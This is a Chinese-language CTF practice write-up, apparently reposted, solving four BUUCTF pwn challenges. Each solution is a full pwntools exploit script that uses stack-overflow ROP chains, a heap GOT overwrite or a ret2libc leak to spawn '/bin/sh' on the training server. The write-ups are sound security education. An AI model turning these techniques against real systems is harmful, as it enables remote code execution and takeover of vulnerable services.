PWN-PRACTICE-BUUCTF-12

• • cmcc_simplerop
  • picoctf_2018_buffer overflow 2
  • babyfengshui_33c3_2016
  • xdctf2015_pwn200

cmcc_simplerop

靜態(tài)編譯的32位elf，找一個"int 80h"執(zhí)行系統(tǒng)調(diào)用
前提是利用棧溢出讀入字符串"/bin/sh\x00"，然后找pop給寄存器賦值，最后"int 80h"，有execve("/bin/sh",0,0)

from pwn import * io = remote('node4.buuoj.cn',27587) #io=process('./cmcc_simplerop') int_80 = 0x80493e1 pop_eax = 0x80bae06 read_addr = 0x0806CD50 binsh_addr = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850payload = 'a'*(0x1c+4) + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8) + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_80)io.sendline(payload) io.sendline('/bin/sh\x00') io.interactive()

picoctf_2018_buffer overflow 2

32位elf的棧溢出，傳入合適的參數(shù)即可

from pwn import * #io=process('./PicoCTF_2018_buffer_overflow_2') io=remote('node4.buuoj.cn',27944) elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=elf.sym['win'] io.recvuntil('string: \n') payload='a'*(0x6c+4)+p32(win)+p32(0x0804866D)+p32(0xDEADBEEF)+p32(0xDEADC0DE) io.sendline(payload) io.interactive()

babyfengshui_33c3_2016

參考：babyfengshui_33c3_2016題解

from pwn import * #io=process("./babyfengshui_33c3_2016") io=remote("node4.buuoj.cn",26888) elf=ELF("./babyfengshui_33c3_2016") libc=ELF("./libc-2.23-16-x32.so") free_got=elf.got["free"] print(hex(free_got)) def add(size,name,text_len,text):io.sendlineafter("Action: ","0")io.sendlineafter("size of description: ",str(size))io.sendlineafter("name: ",name)io.sendlineafter("text length: ",str(text_len))io.sendlineafter("text: ",text) def delete(index):io.sendlineafter("Action: ","1")io.sendlineafter("index: ",str(index)) def show(index):io.sendlineafter("Action: ","2")io.sendlineafter("index: ",str(index)) def change(index,text_len,text):io.sendlineafter("Action: ","3")io.sendlineafter("index: ",str(index))io.sendlineafter("text length: ",str(text_len))io.sendlineafter("text: ",text)#gdb.attach(io) #pause()add(0x10,"aaaa",0x10,"bbbb") #chunk0 add(0x10,"cccc",0x10,"dddd") #chunk1 add(0x10,"eeee",0x10,"/bin/sh\x00") #chunk2#pause()delete(0) #add(0x80,"gggg",0x20,"hhhh")#pause()payload="a"*(0x80+4)+p32(0x19)+"d"*0x10+p32(0)+p32(0x89)+p32(free_got) add(0x80,"gggg",len(payload),payload)#pause()show(1) io.recvuntil("description: ") free_addr=u32(io.recv(4)) print(hex(free_addr)) libc_base=free_addr-libc.sym["free"] system=libc_base+libc.sym["system"]#pause()payload=p32(system) change(1,len(payload),payload)#pause()delete(2)io.interactive()

xdctf2015_pwn200

棧溢出，ret2libc

from pwn import * #io=process('./xdctf2015_pwn200') io=remote('node4.buuoj.cn',25803) elf=ELF('./xdctf2015_pwn200') libc=ELF('./libc-2.23-x32.so') main_addr=elf.sym['main'] write_plt=elf.plt['write'] write_got=elf.got['write'] io.recvuntil('XDCTF2015~!\n') payload='a'*(0x6c+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) io.sendline(payload) write_addr=u32(io.recv(4)) print(hex(write_addr)) libc_base=write_addr-libc.sym['write'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next() io.recvuntil('XDCTF2015~!\n') payload='a'*(0x6c+4)+p32(system)+p32(main_addr)+p32(binsh) io.sendline(payload) io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-12的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。